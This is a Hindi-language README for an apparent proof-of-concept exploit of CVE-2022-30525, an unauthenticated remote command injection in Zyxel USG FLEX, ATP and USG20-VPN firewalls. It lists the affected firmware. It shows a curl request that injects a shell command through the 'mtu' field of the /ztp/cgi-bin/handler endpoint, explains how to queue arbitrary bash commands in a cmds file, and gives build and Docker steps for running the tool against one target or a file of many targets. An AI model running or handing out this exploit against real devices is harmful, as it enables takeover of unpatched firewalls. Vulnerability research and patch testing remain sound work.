
CVE-2022-30525 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण जो /ztp/cgi-bin/handler एंडपॉइंट पर HTTP POST अनुरोधों के माध्यम से Zyxel फ़ायरवॉल पर अनधिकृत रिमोट कमांड इंजेक्शन सक्षम करता है।
Rapid7 ने एक भेद्यता की खोज की और रिपोर्ट की जो Zyxel फ़ायरवॉल को प्रभावित करती है जो Zero Touch Provisioning (ZTP) का समर्थन करते हैं, जिसमें ATP श्रृंखला, VPN श्रृंखला, और USG FLEX श्रृंखला (USG20-VPN और USG20W-VPN सहित) शामिल हैं। यह भेद्यता, जिसे CVE-2022-30525 के रूप में पहचाना गया है, एक अप्रमाणित और दूरस्थ हमलावर को प्रभावित डिवाइस पर nobody उपयोगकर्ता के रूप में मनमाना कोड निष्पादन प्राप्त करने की अनुमति देती है।
निम्न तालिका में प्रभावित मॉडल और फ़र्मवेयर संस्करण शामिल हैं।
प्रभावित मॉडल USG FLEX 100, 100W, 200, 500, 700 ZLD5.00 से ZLD5.21 Patch 1 USG20-VPN, USG20W-VPN ZLD5.10 से ZLD5.21 Patch 1 ATP 100, 200, 500, 700, 800 ZLD5.10 से ZLD5.21 Patch 1
VPN श्रृंखला, जो ZTP का भी समर्थन करती है, भेद्य नहीं है क्योंकि यह आवश्यक कार्यक्षमता का समर्थन नहीं करती है।
प्रभावित मॉडल प्रशासनिक HTTP इंटरफ़ेस के माध्यम से अप्रमाणित और दूरस्थ कमांड इंजेक्शन के लिए भेद्य हैं। कमांड nobody उपयोगकर्ता के रूप में निष्पादित होते हैं। इस भेद्यता का शोषण /ztp/cgi-bin/handler URI के माध्यम से किया जाता है।
curl -v --insecure -X POST -H "Content-Type: application/json" -d
'{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged"
:"1","vlanid":"5","mtu":"; ping 192.168.1.220;","data":"hi"}'
https://192.168.1.1/ztp/cgi-bin/handler
एक cmds फ़ाइल बनाई जानी चाहिए जहाँ आप प्रोग्राम के माध्यम से निष्पादित किए जाने वाले कमांड निम्न प्रारूप में जोड़ सकते हैं:
bash -c "command#1 && command#2 && etc."
For example:
bash -c "ping 8.8.8.8"
Golang
1. git clone https://github.com/iveresk/cve-2022-30525.git
2. cd cve-2022-30525
3. go build cve-2022-30525.go -o /cve-2022-30525
4. chmod +x cve-2022-30525
5. ./cve-2022-30525 -t <targetURL> [or <targetFile>]
Dockerfile
docker run -it -e INPUT_FILE=<file_name> masterrooot/cve-30525
जहाँ INPUT_FILE एक लक्ष्य URL या लक्ष्यों की सूची वाली फ़ाइल है।
आप किसी भी विवरण के लिए Keybase के माध्यम से मुझसे संपर्क करने के लिए स्वतंत्र हैं।